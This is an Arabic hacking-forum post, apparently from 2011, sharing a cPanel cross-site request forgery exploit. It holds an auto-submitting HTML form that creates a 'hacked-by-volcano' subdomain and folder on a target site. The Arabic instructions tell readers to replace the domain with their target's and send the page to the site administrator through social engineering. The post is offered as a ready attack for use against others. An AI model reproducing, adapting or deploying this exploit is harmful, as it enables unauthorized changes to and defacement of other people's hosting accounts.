التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-06-2011, 08:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي Cpanel [CSRF] Add Sub domain


كود PHP:
### Exploit Title: Cpanel [CSRF] Add Sub domain########
# Author: kalashnikov
# Software Link: http://www.cpanel.net/
###############/Exploit\###############################
<html>
<
body onload="********.csrf.submit();">
<
form name="csrf" method="POST" name="form0" action="http://vbspiders.com:2082/frontend/x3/subdomain/doadddomain.html">
<
input type="hidden" name="domain" value="hacked-by-volcano" /> . <input type="hidden" name="rootdomain" value="vbspiders.com" />
<
input type="hidden" name="dir" value="public_html/VoLc4n0" />
<
input type="hidden" name="go" value="public_html/VoLc4n0/hacked" />
</
html>
######################################################
Home :- VbSpIdErS.CoM VoLc4n0 FLa$h StOnE LoVe //\\ KaLa$nikoV t34m //\\
Greetz :- FK Mr.NoHa
###################################################### 

الثغره عاديه ومش خطيره

وتحتاج لهدنسه اجتماعيه كويسه :D

شرح ......
احفظ الثغره بامتداد html
غير اسم الدومين vbspiders.com الى الدومين الهدف
غير هذا الى ما تريد hacked-by-volcano
غير هذا الى ما تريد public_html/VoLc4n0
غير هذا الى ما تريد public_html/VoLc4n0/hacked

حسب الاعدادات اعلى سيتم انشاء هذا الدومين
hacked-by-volcano.vbspiders.com
وبداخله مجلد باسم
hacked

الاستغلال تقوم بحفظ الصفحه بامتداد html وارسالها الى اداري االموقع .....


بالتوفيق


Cpanel FCSRFD Add Sub domain

الملفات المرفقة
نوع الملف: txt exploit.txt‏ (821 بايت, المشاهدات 7)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:40 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0